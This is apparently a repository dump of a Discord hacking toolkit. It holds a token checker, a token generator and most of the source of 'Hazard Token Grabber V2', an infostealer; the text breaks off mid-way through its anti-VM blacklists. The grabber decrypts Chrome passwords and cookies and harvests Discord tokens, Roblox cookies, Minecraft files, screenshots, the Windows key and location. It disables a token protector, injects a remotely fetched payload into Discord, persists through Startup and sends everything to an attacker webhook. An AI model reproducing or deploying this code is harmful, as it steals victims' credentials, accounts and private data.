Checker.py: -------------------------------------------------------------------------------- 1 | from typing import Generator 2 | from os import system, path 3 | 4 | import sys 5 | import aiohttp 6 | import os 7 | 8 | os.system("color 2") 9 | 10 | if sys.version_info < (3, 7): 11 | exit(f"Python version ({sys.version}) doesn't support asyncio syntax used in this script.\n\nPlease update to Python 3.7 or higher.") 12 | 13 | import asyncio 14 | 15 | q = "\033[92m[?]\033[0m " 16 | x = "\033[92m[X]\033[0m " 17 | i = "\033[92m[!]\033[0m " 18 | 19 | def cls() -> None: 20 | if sys.platform in ('win32'): 21 | return system('cls') 22 | return system('clear') 23 | 24 | class TokenCheker: 25 | def __init__(self) -> None: 26 | self.accounts_working: list = [] 27 | self.accounts_not_working: list = [] 28 | 29 | self.counter_working: int = 0 30 | self.counter_not_working: int = 0 31 | 32 | self._requests_count: int = 0 33 | self._rate_limit: int = 60 34 | self._is_rate_limit: bool = False 35 | 36 | @property 37 | def discord_api(self) -> str: 38 | return "https://discordapp.com/api/" 39 | 40 | @staticmethod 41 | def headers(token: str) -> dict: 42 | return {"authorization": token} 43 | 44 | def load_tokens(self, fpath: str) -> Generator[str, None, None]: 45 | tokens = 0 46 | with open(fpath, "r") as f: 47 | for line in f.readlines(): 48 | line = line.replace(" ", "") 49 | line = line.replace("\r", "") 50 | line = line.replace("\n", "") 51 | 52 | if not line: 53 | continue 54 | 55 | tokens += 1 56 | 57 | yield line 58 | 59 | async def check_token(self, token: str) -> None: 60 | """This function will try login into discord api using token, 61 | 62 | This function will respect discord rate limit: `60` per sec. 63 | """ 64 | async with aiohttp.ClientSession() as session: 65 | async with session.get(f"{self.discord_api}v6/users/@me/library", headers=self.headers(token)) as r: 66 | if r.status == 200: # when token is valid. 67 | self.accounts_working.append(token) 68 | self.counter_working += 1 69 | return 70 | 71 | self.counter_not_working += 1 72 | self.accounts_not_working.append(token) 73 | 74 | async def _run(self) -> None: 75 | tasks: list = [] 76 | cls() 77 | for token in self.load_tokens(q2): 78 | self._requests_count += 1 79 | 80 | if self._requests_count >= self._rate_limit: 81 | print(i, "\nRate limit was active waiting 1 second...\n") 82 | self._requests_count = 0 83 | await asyncio.sleep(1) 84 | 85 | tasks.append(asyncio.create_task(self.check_token(token))) 86 | print("{}Total checked: {} | Working: {} | Not Working: {}".format(i, self.counter_working + self.counter_not_working, self.counter_working, self.counter_not_working), end="\r") 87 | await asyncio.wait(tasks) 88 | print("{}Total checked: {} | Working: {} | Not Working: {}".format(i, self.counter_working + self.counter_not_working, self.counter_working, self.counter_not_working)) 89 | 90 | if __name__ == '__main__': 91 | cls() 92 | q2 = "Tools/Token Gen/Tokens.txt" 93 | 94 | if not path.exists(q2): 95 | while True: 96 | q2 = input("{}Please provide a valid file path: ".format(x)) 97 | if path.exists(q2): 98 | break 99 | 100 | q1 = input("{}Want to save 101 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Token Gen/TokenGen.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | import pathlib 4 | import requests, os, threading, sys, time, random, ctypes, webbrowser,re, hashlib, datetime, os.path 5 | import colorama 6 | from colorama import Fore, init, Back, Style 7 | from datetime import date 8 | 9 | def Spinner(): 10 | l = ['|', '/', '-', '\\'] 11 | for i in l+l+l: 12 | sys.stdout.write('\r' + Fore.GREEN +'TokenGen is Starting...'+i) 13 | sys.stdout.flush() 14 | time.sleep(0.2) 15 | 16 | Spinner() 17 | 18 | count = 0 19 | current_path = os.path.dirname(os.path.realpath(__file__)) 20 | 21 | print(Fore.WHITE +Fore.GREEN +"-\ "+Fore.BLUE+" TokenGen -\-\-") 22 | print(Fore.WHITE +Fore.GREEN +"-\ [1] "+Fore.BLUE+"Token Generator \-") 23 | print(Fore.WHITE +Fore.GREEN +"-\ [2] "+Fore.BLUE+"Exit \-") 24 | opcion = input("\nChoice: ") 25 | if opcion=='1': 26 | cantidad = input("\nAmount to generate: ") 27 | while int(count) str: 82 | try: 83 | epoch = datetime(1601, 1, 1, tzinfo=timezone.utc) 84 | codestamp = epoch + timedelta(microseconds=time) 85 | return codestamp 86 | except Exception: 87 | pass 88 | 89 | @staticmethod 90 | def win_decrypt(encrypted_str: bytes) -> str: 91 | return CryptUnprotectData(encrypted_str, None, None, None, 0)[1] 92 | 93 | @staticmethod 94 | def create_temp_file(_dir: str or os.PathLike = gettempdir()): 95 | file_name = ''.join(random.SystemRandom().choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for _ in range(random.randint(10, 20))) 96 | path = ntpath.join(_dir, file_name) 97 | open(path, "x") 98 | return path 99 | 100 | @staticmethod 101 | def decrypt_val(buff, master_key) -> str: 102 | try: 103 | iv = buff[3:15] 104 | payload = buff[15:] 105 | cipher = AES.new(master_key, AES.MODE_GCM, iv) 106 | decrypted_pass = cipher.decrypt(payload) 107 | decrypted_pass = decrypted_pass[:-16].decode() 108 | return decrypted_pass 109 | except Exception: 110 | return f'Failed to decrypt "{str(buff)}" | key: "{str(master_key)}"' 111 | 112 | @staticmethod 113 | def get_headers(token: str = None): 114 | headers = { 115 | "Content-Type": "application/json", 116 | } 117 | if token: 118 | headers.update({"Authorization": token}) 119 | return headers 120 | 121 | @staticmethod 122 | def system_info() -> list: 123 | flag = 0x08000000 124 | sh1 = "wmic csproduct get uuid" 125 | sh2 = "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" 126 | sh3 = "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 127 | try: 128 | HWID = subprocess.check_output(sh1, creationflags=flag).decode().split('\n')[1].strip() 129 | except Exception: 130 | HWID = "N/A" 131 | try: 132 | wkey = subprocess.check_output(sh2, creationflags=flag).decode().rstrip() 133 | except Exception: 134 | wkey = "N/A" 135 | try: 136 | winver = subprocess.check_output(sh3, creationflags=flag).decode().rstrip() 137 | except Exception: 138 | winver = "N/A" 139 | return [HWID, winver, wkey] 140 | 141 | @staticmethod 142 | def network_info() -> list: 143 | ip, city, country, region, org, loc, googlemap = "None", "None", "None", "None", "None", "None", "None" 144 | req = httpx.get("https://ipinfo.io/json") 145 | if req.status_code == 200: 146 | data = req.json() 147 | ip = data.get('ip') 148 | city = data.get('city') 149 | country = data.get('country') 150 | region = data.get('region') 151 | org = data.get('org') 152 | loc = data.get('loc') 153 | googlemap = "https://www.google.com/maps/search/google+map++" + loc 154 | return [ip, city, country, region, org, loc, googlemap] 155 | 156 | @staticmethod 157 | def fetch_conf(e: str) -> str or bool | None: 158 | return __config__.get(e) 159 | 160 | 161 | class HazardTokenGrabberV2(Functions): 162 | def __init__(self): 163 | self.webhook = self.fetch_conf('webhook') 164 | self.discordApi = "https://discord.com/api/v9/users/@me" 165 | self.appdata = os.getenv("localappdata") 166 | self.roaming = os.getenv("appdata") 167 | self.chrome_user_data = ntpath.join(self.appdata, 'Google', 'Chrome', 'User Data') 168 | self.dir, self.temp = mkdtemp(), gettempdir() 169 | inf, net = self.system_info(), self.network_info() 170 | self.hwid, self.winver, self.winkey = inf[0], inf[1], inf[2] 171 | self.ip, self.city, self.country, self.region, self.org, self.loc, self.googlemap = net[0], net[1], net[2], net[3], net[4], net[5], net[6] 172 | self.startup_loc = ntpath.join(self.roaming, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup') 173 | 174 | self.hook_reg = "api/webhooks" 175 | self.chrome_reg = re.compile(r'(^profile\s\d*)|default|(guest profile$)', re.IGNORECASE | re.MULTILINE) 176 | self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}" 177 | self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*" 178 | 179 | self.sep = os.sep 180 | self.tokens = [] 181 | self.robloxcookies = [] 182 | self.chrome_key = self.get_master_key(ntpath.join(self.chrome_user_data, "Local State")) 183 | 184 | os.makedirs(self.dir, exist_ok=True) 185 | 186 | def hazard_exit(self): 187 | shutil.rmtree(self.dir, ignore_errors=True) 188 | os._exit(0) 189 | 190 | def try_extract(func): 191 | '''Decorator to safely catch and ignore exceptions''' 192 | def wrapper(*args, **kwargs): 193 | try: 194 | func(*args, **kwargs) 195 | except Exception: 196 | pass 197 | return wrapper 198 | 199 | async def checkToken(self, tkn: str) -> str: 200 | try: 201 | r = httpx.get( 202 | url=self.discordApi, 203 | headers=self.get_headers(tkn), 204 | timeout=5.0 205 | ) 206 | except (httpx.ConnectTimeout, httpx.TimeoutException): 207 | pass 208 | if r.status_code == 200 and tkn not in self.tokens: 209 | self.tokens.append(tkn) 210 | 211 | async def init(self): 212 | if self.webhook == "" or self.webhook == "\x57EBHOOK_HERE": 213 | self.hazard_exit() 214 | 215 | if __author__ != "\x52\x64\x69\x6d\x6f": 216 | self.hazard_exit() 217 | 218 | if self.fetch_conf('anti_debug') and AntiDebug().inVM is True: 219 | self.hazard_exit() 220 | 221 | await self.bypassBetterDiscord() 222 | await self.bypassTokenProtector() 223 | 224 | function_list = [self.screenshot, self.sys_dump, self.grab_tokens, self.grabMinecraftCache, self.grabRobloxCookie] 225 | if self.fetch_conf('hide_self'): 226 | function_list.append(self.hide) 227 | 228 | if self.fetch_conf('kill_processes'): 229 | await self.killProcesses() 230 | 231 | if self.fetch_conf('startup'): 232 | function_list.append(self.startup) 233 | 234 | if ntpath.exists(self.chrome_user_data) and self.chrome_key is not None: 235 | os.makedirs(ntpath.join(self.dir, 'Google'), exist_ok=True) 236 | function_list.extend([self.grabPassword, self.grabCookies, self.grabHistory]) 237 | 238 | for func in function_list: 239 | process = threading.Thread(target=func, daemon=True) 240 | process.start() 241 | for t in threading.enumerate(): 242 | try: 243 | t.join() 244 | except RuntimeError: 245 | continue 246 | self.neatifyTokens() 247 | await self.injector() 248 | self.finish() 249 | 250 | def hide(self): 251 | ctypes.windll.kernel32.SetFileAttributesW(argv[0], 2) 252 | 253 | def startup(self): 254 | try: 255 | shutil.copy2(argv[0], self.startup_loc) 256 | except Exception: 257 | pass 258 | 259 | async def injector(self): 260 | # TO DO: reduce cognetive complexity 261 | for _dir in os.listdir(self.appdata): 262 | if 'discord' in _dir.lower() and ntpath.isdir(_dir): 263 | discord = self.appdata + os.sep + _dir 264 | for __dir in os.listdir(ntpath.abspath(discord)): 265 | if re.match(r'app-(\d*\.\d*)*', __dir): 266 | app = ntpath.abspath(ntpath.join(discord, __dir)) 267 | modules = ntpath.join(app, 'modules') 268 | if not ntpath.exists(modules): 269 | return 270 | for ___dir in os.listdir(modules): 271 | if re.match(r"discord_desktop_core-\d+", ___dir): 272 | inj_path = modules + os.sep + ___dir + f'\\discord_desktop_core\\' 273 | if ntpath.exists(inj_path): 274 | if self.startup_loc not in argv[0]: 275 | try: 276 | os.makedirs(inj_path + 'initiation', exist_ok=True) 277 | except PermissionError: 278 | pass 279 | if self.hook_reg in self.webhook: 280 | f = httpx.get(self.fetch_conf('injection_url')).text.replace("%WEBHOOK%", self.webhook) 281 | else: 282 | f = httpx.get( 283 | self.fetch_conf('injection_url')).text.replace( 284 | "%WEBHOOK%", self.webhook).replace( 285 | "%WEBHOOK_KEY%", self.fetch_conf('webhook_protector_key')) 286 | try: 287 | with open(inj_path + 'index.js', 'w', errors="ignore") as indexFile: 288 | indexFile.write(f) 289 | except PermissionError: 290 | pass 291 | if self.fetch_conf('kill_processes'): 292 | os.startfile(app + self.sep + _dir + '.exe') 293 | 294 | async def killProcesses(self): 295 | blackListedPrograms = self.fetch_conf('blackListedPrograms') 296 | for i in ['discord', 'discordtokenprotector', 'discordcanary', 'discorddevelopment', 'discordptb']: 297 | blackListedPrograms.append(i) 298 | for proc in psutil.process_iter(): 299 | if any(procstr in proc.name().lower() for procstr in blackListedPrograms): 300 | try: 301 | proc.kill() 302 | except (psutil.NoSuchProcess, psutil.AccessDenied): 303 | pass 304 | 305 | async def bypassTokenProtector(self): 306 | # fucks up the discord token protector by https://github.com/andro2157/DiscordTokenProtector 307 | tp = f"{self.roaming}\\DiscordTokenProtector\\" 308 | if not ntpath.exists(tp): 309 | return 310 | config = tp + "config.json" 311 | 312 | for i in ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]: 313 | try: 314 | os.remove(tp + i) 315 | except FileNotFoundError: 316 | pass 317 | if ntpath.exists(config): 318 | with open(config, errors="ignore") as f: 319 | try: 320 | item = json.load(f) 321 | except json.decoder.JSONDecodeError: 322 | return 323 | item['Rdimo_just_shit_on_this_token_protector'] = "https://github.com/Rdimo" 324 | item['auto_start'] = False 325 | item['auto_start_discord'] = False 326 | item['integrity'] = False 327 | item['integrity_allowbetterdiscord'] = False 328 | item['integrity_checkexecutable'] = False 329 | item['integrity_checkhash'] = False 330 | item['integrity_checkmodule'] = False 331 | item['integrity_checkscripts'] = False 332 | item['integrity_checkresource'] = False 333 | item['integrity_redownloadhashes'] = False 334 | item['iterations_iv'] = 364 335 | item['iterations_key'] = 457 336 | item['version'] = 69420 337 | with open(config, 'w') as f: 338 | json.dump(item, f, indent=2, sort_keys=True) 339 | with open(config, 'a') as f: 340 | f.write("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo") 341 | 342 | async def bypassBetterDiscord(self): 343 | bd = self.roaming + "\\BetterDiscord\\data\\betterdiscord.asar" 344 | if ntpath.exists(bd): 345 | x = self.hook_reg 346 | with open(bd, 'r', encoding="cp437", errors='ignore') as f: 347 | txt = f.read() 348 | content = txt.replace(x, 'RdimoTheGoat') 349 | with open(bd, 'w', newline='', encoding="cp437", errors='ignore') as f: 350 | f.write(content) 351 | 352 | @try_extract 353 | def grab_tokens(self): 354 | paths = { 355 | 'Discord': self.roaming + '\\discord\\Local Storage\\leveldb\\', 356 | 'Discord Canary': self.roaming + '\\discordcanary\\Local Storage\\leveldb\\', 357 | 'Lightcord': self.roaming + '\\Lightcord\\Local Storage\\leveldb\\', 358 | 'Discord PTB': self.roaming + '\\discordptb\\Local Storage\\leveldb\\', 359 | 'Opera': self.roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\', 360 | 'Opera GX': self.roaming + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\', 361 | 'Amigo': self.appdata + '\\Amigo\\User Data\\Local Storage\\leveldb\\', 362 | 'Torch': self.appdata + '\\Torch\\User Data\\Local Storage\\leveldb\\', 363 | 'Kometa': self.appdata + '\\Kometa\\User Data\\Local Storage\\leveldb\\', 364 | 'Orbitum': self.appdata + '\\Orbitum\\User Data\\Local Storage\\leveldb\\', 365 | 'CentBrowser': self.appdata + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\', 366 | '7Star': self.appdata + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\', 367 | 'Sputnik': self.appdata + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\', 368 | 'Vivaldi': self.appdata + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\', 369 | 'Chrome SxS': self.appdata + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\', 370 | 'Chrome': self.chrome_user_data + '\\Default\\Local Storage\\leveldb\\', 371 | 'Epic Privacy Browser': self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\', 372 | 'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\', 373 | 'Uran': self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\', 374 | 'Yandex': self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\', 375 | 'Brave': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\', 376 | 'Iridium': self.appdata + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\' 377 | } 378 | 379 | for name, path in paths.items(): 380 | if not ntpath.exists(path): 381 | continue 382 | disc = name.replace(" ", "").lower() 383 | if "cord" in path: 384 | if ntpath.exists(self.roaming + f'\\{disc}\\Local State'): 385 | for file_name in os.listdir(path): 386 | if file_name[-3:] not in ["log", "ldb"]: 387 | continue 388 | for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: 389 | for y in re.findall(self.encrypted_regex, line): 390 | token = self.decrypt_val(b64decode(y.split('dQw4w9WgXcQ:')[1]), self.get_master_key(self.roaming + f'\\{disc}\\Local State')) 391 | asyncio.run(self.checkToken(token)) 392 | else: 393 | for file_name in os.listdir(path): 394 | if file_name[-3:] not in ["log", "ldb"]: 395 | continue 396 | for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: 397 | for token in re.findall(self.regex, line): 398 | asyncio.run(self.checkToken(token)) 399 | 400 | if ntpath.exists(self.roaming + "\\Mozilla\\Firefox\\Profiles"): 401 | for path, _, files in os.walk(self.roaming + "\\Mozilla\\Firefox\\Profiles"): 402 | for _file in files: 403 | if not _file.endswith('.sqlite'): 404 | continue 405 | for line in [x.strip() for x in open(f'{path}\\{_file}', errors='ignore').readlines() if x.strip()]: 406 | for token in re.findall(self.regex, line): 407 | asyncio.run(self.checkToken(token)) 408 | 409 | @try_extract 410 | def grabPassword(self): 411 | f = open(ntpath.join(self.dir, 'Google', 'Google Passwords.txt'), 'w', encoding="cp437", errors='ignore') 412 | for prof in os.listdir(self.chrome_user_data): 413 | if re.match(self.chrome_reg, prof): 414 | login_db = ntpath.join(self.chrome_user_data, prof, 'Login Data') 415 | login = self.create_temp_file() 416 | 417 | shutil.copy2(login_db, login) 418 | conn = sqlite3.connect(login) 419 | cursor = conn.cursor() 420 | cursor.execute("SELECT action_url, username_value, password_value FROM logins") 421 | 422 | for r in cursor.fetchall(): 423 | url = r[0] 424 | username = r[1] 425 | encrypted_password = r[2] 426 | decrypted_password = self.decrypt_val(encrypted_password, self.chrome_key) 427 | if url != "": 428 | f.write(f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n") 429 | 430 | cursor.close() 431 | conn.close() 432 | os.remove(login) 433 | f.close() 434 | 435 | @try_extract 436 | def grabCookies(self): 437 | f = open(ntpath.join(self.dir, 'Google', 'Google Cookies.txt'), 'w', encoding="cp437", errors='ignore') 438 | for prof in os.listdir(self.chrome_user_data): 439 | if re.match(self.chrome_reg, prof): 440 | login_db = ntpath.join(self.chrome_user_data, prof, 'Network', 'cookies') 441 | login = self.create_temp_file() 442 | 443 | shutil.copy2(login_db, login) 444 | conn = sqlite3.connect(login) 445 | cursor = conn.cursor() 446 | cursor.execute("SELECT host_key, name, encrypted_value from cookies") 447 | 448 | for r in cursor.fetchall(): 449 | host = r[0] 450 | user = r[1] 451 | decrypted_cookie = self.decrypt_val(r[2], self.chrome_key) 452 | if host != "": 453 | f.write(f"HOST KEY: {host} | NAME: {user} | VALUE: {decrypted_cookie}\n") 454 | if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_' in decrypted_cookie: 455 | self.robloxcookies.append(decrypted_cookie) 456 | 457 | cursor.close() 458 | conn.close() 459 | os.remove(login) 460 | f.close() 461 | 462 | @try_extract 463 | def grabHistory(self): 464 | f = open(ntpath.join(self.dir, 'Google', 'Google History.txt'), 'w', encoding="cp437", errors='ignore') 465 | 466 | def extract_search_history(db_cursor): 467 | db_cursor.execute('SELECT term FROM keyword_search_terms') 468 | search_terms = "" 469 | for item in db_cursor.fetchall(): 470 | if item[0] != "": 471 | search_terms += f"{item[0]}\n" 472 | return search_terms 473 | 474 | def extract_web_history(db_cursor): 475 | web = "" 476 | db_cursor.execute('SELECT title, url, last_visit_time FROM urls') 477 | for item in db_cursor.fetchall(): 478 | web += f"Title: {item[0]}\nUrl: {item[1]}\nLast Time Visit: {self.convert_time(item[2]).strftime('%Y/%m/%d - %H:%M:%S')}\n\n" 479 | return web 480 | 481 | for prof in os.listdir(self.chrome_user_data): 482 | if re.match(self.chrome_reg, prof): 483 | login_db = ntpath.join(self.chrome_user_data, prof, 'History') 484 | login = self.create_temp_file() 485 | 486 | shutil.copy2(login_db, login) 487 | conn = sqlite3.connect(login) 488 | cursor = conn.cursor() 489 | 490 | search_history = extract_search_history(cursor) 491 | web_history = extract_web_history(cursor) 492 | 493 | f.write(f"{' '*17}Search History\n{'-'*50}\n{search_history}\n{' '*17}\n\nWeb History\n{'-'*50}\n{web_history}") 494 | 495 | cursor.close() 496 | conn.close() 497 | os.remove(login) 498 | f.close() 499 | 500 | def neatifyTokens(self): 501 | f = open(self.dir + "\\Discord Info.txt", "w", encoding="cp437", errors='ignore') 502 | for token in self.tokens: 503 | j = httpx.get(self.discordApi, headers=self.get_headers(token)).json() 504 | user = j.get('username') + '#' + str(j.get("discriminator")) 505 | 506 | badges = "" 507 | flags = j['flags'] 508 | if (flags == 1): 509 | badges += "Staff, " 510 | if (flags == 2): 511 | badges += "Partner, " 512 | if (flags == 4): 513 | badges += "Hypesquad Event, " 514 | if (flags == 8): 515 | badges += "Green Bughunter, " 516 | if (flags == 64): 517 | badges += "Hypesquad Bravery, " 518 | if (flags == 128): 519 | badges += "HypeSquad Brillance, " 520 | if (flags == 256): 521 | badges += "HypeSquad Balance, " 522 | if (flags == 512): 523 | badges += "Early Supporter, " 524 | if (flags == 16384): 525 | badges += "Gold BugHunter, " 526 | if (flags == 131072): 527 | badges += "Verified Bot Developer, " 528 | if (badges == ""): 529 | badges = "None" 530 | 531 | email = j.get("email") 532 | phone = j.get("phone") if j.get("phone") else "No Phone Number attached" 533 | nitro_data = httpx.get(self.discordApi + '/billing/subscriptions', headers=self.get_headers(token)).json() 534 | has_nitro = False 535 | has_nitro = bool(len(nitro_data) > 0) 536 | billing = bool(len(json.loads(httpx.get(self.discordApi + "/billing/payment-sources", headers=self.get_headers(token)).text)) > 0) 537 | f.write(f"{' '*17}{user}\n{'-'*50}\nToken: {token}\nHas Billing: {billing}\nNitro: {has_nitro}\nBadges: {badges}\nEmail: {email}\nPhone: {phone}\n\n") 538 | f.close() 539 | 540 | def grabMinecraftCache(self): 541 | minecraft = ntpath.join(self.dir, 'Minecraft') 542 | os.makedirs(minecraft, exist_ok=True) 543 | mc = ntpath.join(self.roaming, '.minecraft') 544 | to_grab = ['launcher_accounts.json', 'launcher_profiles.json', 'usercache.json', 'launcher_log.txt'] 545 | 546 | for _file in to_grab: 547 | if ntpath.exists(ntpath.join(mc, _file)): 548 | shutil.copy2(ntpath.join(mc, _file), minecraft + self.sep + _file) 549 | 550 | def grabRobloxCookie(self): 551 | def subproc(path): 552 | try: 553 | return subprocess.check_output( 554 | fr"powershell Get-ItemPropertyValue -Path {path}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY", 555 | creationflags=0x08000000).decode().rstrip() 556 | except Exception: 557 | return None 558 | reg_cookie = subproc(r'HKLM') 559 | if not reg_cookie: 560 | reg_cookie = subproc(r'HKCU') 561 | if reg_cookie: 562 | self.robloxcookies.append(reg_cookie) 563 | if self.robloxcookies: 564 | with open(self.dir + "\\Roblox Cookies.txt", "w") as f: 565 | for i in self.robloxcookies: 566 | f.write(i + '\n') 567 | 568 | def screenshot(self): 569 | image = ImageGrab.grab( 570 | bbox=None, 571 | include_layered_windows=False, 572 | all_screens=True, 573 | xdisplay=None 574 | ) 575 | image.save(self.dir + "\\Screenshot.png") 576 | image.close() 577 | 578 | def sys_dump(self): 579 | line_sep = "=" * 50 580 | about = f""" 581 | {line_sep} 582 | {Victim} | {Victim_pc} 583 | {line_sep} 584 | Windows key: {self.winkey} 585 | Windows version: {self.winver} 586 | {line_sep} 587 | RAM: {ram}GB 588 | DISK: {disk}GB 589 | HWID: {self.hwid} 590 | {line_sep} 591 | IP: {self.ip} 592 | City: {self.city} 593 | Country: {self.country} 594 | Region: {self.region} 595 | Org: {self.org} 596 | GoogleMaps: {self.googlemap} 597 | {line_sep} 598 | """ 599 | with open(self.dir + "\\System info.txt", "w", encoding="utf-8", errors='ignore') as f: 600 | f.write(about) 601 | 602 | def finish(self): 603 | for i in os.listdir(self.dir): 604 | if i.endswith('.txt'): 605 | path = self.dir + self.sep + i 606 | with open(path, "r", errors="ignore") as ff: 607 | x = ff.read() 608 | if not x: 609 | ff.close() 610 | os.remove(path) 611 | else: 612 | with open(path, "w", encoding="utf-8", errors="ignore") as f: 613 | f.write("🌟・Grabber By github.com/Rdimo・https://github.com/Rdimo/Hazard-Token-Grabber-V2\n\n") 614 | with open(path, "a", encoding="utf-8", errors="ignore") as fp: 615 | fp.write(x + "\n\n🌟・Grabber By github.com/Rdimo・https://github.com/Rdimo/Hazard-Token-Grabber-V2") 616 | 617 | _zipfile = ntpath.join(self.appdata, f'Hazard.V2-[{Victim}].zip') 618 | zipped_file = zipfile.ZipFile(_zipfile, "w", zipfile.ZIP_DEFLATED) 619 | abs_src = ntpath.abspath(self.dir) 620 | for dirname, _, files in os.walk(self.dir): 621 | for filename in files: 622 | absname = ntpath.abspath(ntpath.join(dirname, filename)) 623 | arcname = absname[len(abs_src) + 1:] 624 | zipped_file.write(absname, arcname) 625 | zipped_file.close() 626 | 627 | file_count, files_found, tokens = 0, '', '' 628 | for _, __, files in os.walk(self.dir): 629 | for _file in files: 630 | files_found += f"・{_file}\n" 631 | file_count += 1 632 | for tkn in self.tokens: 633 | tokens += f'{tkn}\n\n' 634 | fileCount = f"{file_count} Files Found: " 635 | 636 | embed = { 637 | 'avatar_url': 'https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Big_hazard.gif', 638 | 'embeds': [ 639 | { 640 | 'author': { 641 | 'name': f'*{Victim}* Just ran Hazard Token Grabber.V2', 642 | 'url': 'https://github.com/Rdimo/Hazard-Token-Grabber-V2', 643 | 'icon_url': 'https://raw.githubusercontent.com/Rdimo/images/master/Hazard-Token-Grabber-V2/Small_hazard.gif' 644 | }, 645 | 'color': 176185, 646 | 'description': f'[Google Maps Location]({self.googlemap})', 647 | 'fields': [ 648 | { 649 | 'name': '\u200b', 650 | 'value': f'''```fix 651 | IP:᠎ {self.ip.replace(" ", "᠎ ") if self.ip else "N/A"} 652 | Org:᠎ {self.org.replace(" ", "᠎ ") if self.org else "N/A"} 653 | City:᠎ {self.city.replace(" ", "᠎ ") if self.city else "N/A"} 654 | Region:᠎ {self.region.replace(" ", "᠎ ") if self.region else "N/A"} 655 | Country:᠎ {self.country.replace(" ", "᠎ ") if self.country else "N/A"}``` 656 | '''.replace(' ', ''), 657 | 'inline': True 658 | }, 659 | { 660 | 'name': '\u200b', 661 | 'value': f'''```fix 662 | PCName: {Victim_pc.replace(" ", "᠎ ")} 663 | WinKey:᠎ {self.winkey.replace(" ", "᠎ ")} 664 | WinVer:᠎ {self.winver.replace(" ", "᠎ ")} 665 | DiskSpace:᠎ {disk}GB 666 | Ram:᠎ {ram}GB``` 667 | '''.replace(' ', ''), 668 | 'inline': True 669 | }, 670 | { 671 | 'name': '**Tokens:**', 672 | 'value': f'''```yaml 673 | {tokens if tokens else "No tokens extracted"}``` 674 | '''.replace(' ', ''), 675 | 'inline': False 676 | }, 677 | { 678 | 'name': fileCount, 679 | 'value': f'''```ini 680 | [ 681 | {files_found.strip()} 682 | ]``` 683 | '''.replace(' ', ''), 684 | 'inline': False 685 | } 686 | ], 687 | 'footer': { 688 | 'text': '🌟・Grabber By github.com/Rdimo・https://github.com/Rdimo/Hazard-Token-Grabber-V2' 689 | } 690 | } 691 | ] 692 | } 693 | if self.fetch_conf('ping_on_run'): 694 | embed.update({'content': '@everyone'}) 695 | 696 | with open(_zipfile, 'rb') as f: 697 | if self.hook_reg in self.webhook: 698 | httpx.post(self.webhook, json=embed) 699 | httpx.post(self.webhook, files={'upload_file': f}) 700 | else: 701 | from pyotp import TOTP 702 | key = TOTP(self.fetch_conf('webhook_protector_key')).now() 703 | httpx.post(self.webhook, headers={"Authorization": key}, json=embed) 704 | httpx.post(self.webhook, headers={"Authorization": key}, files={'upload_file': f}) 705 | os.remove(_zipfile) 706 | self.hazard_exit() 707 | 708 | 709 | class AntiDebug(Functions): 710 | inVM = False 711 | 712 | def __init__(self): 713 | self.processes = list() 714 | 715 | self.blackListedUsers = [ 716 | "WDAGUtilityAccount", "Abby", "Peter Wilson", "hmarc", "patex", "JOHN-PC", "RDhJ0CNFevzX", "kEecfMwgj", "Frank", "8Nl0ColNQ5bq", 717 | "Lisa", "John", "george", "PxmdUOpVyx", "8VizSM", "w0fjuOVmCcP5A", "lmVwjj9b", "PqONjHVwexsS", "3u2v9m8", "Julia", "HEUeRzl", 718 | ] 719 | self.blackListedPCNames = [ 720 | "BEE7370C-8C0C-4", "DESKTOP-NAKFFMT", "WIN-5E07COS9ALR", "B30F0242-1C6A-4", "DESKTOP-VRSQLAG", "Q9IATRKPRH", "XC64ZB", "DESKTOP-D019GDM", 721 | "DESKTOP-WI8CLET", "SERVER1", "LISA-PC", "JOHN-PC", "DESKTOP-B0T93D6", "DESKTOP-1PYKP29", "DESKTOP-1Y2433R", "WILEYPC", "WORK", "6C4E733F-C2D9-4", 722 | "RALPHS-PC", "DESKTOP-WG3MYJS", "DESKTOP-7XC6GEZ", "DESKTOP-5OV9S0O", "QarZhrdBpj", "ORELEEPC", "ARCHIBALDPC", "JULIA-PC", "d1bnJkfVlH", 723 | ] 724 | self.blackListedHWIDS = [ 725 | "7AB5C494-39F5-4941-9163-47F54D6D5016", "032E02B4-0499-05C3-0806-3C0700080009", "03DE0294-0480-05DE-1A06-350700080009", 726 | "11111111-2222-3333-4444-555555555555", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548", 727 | 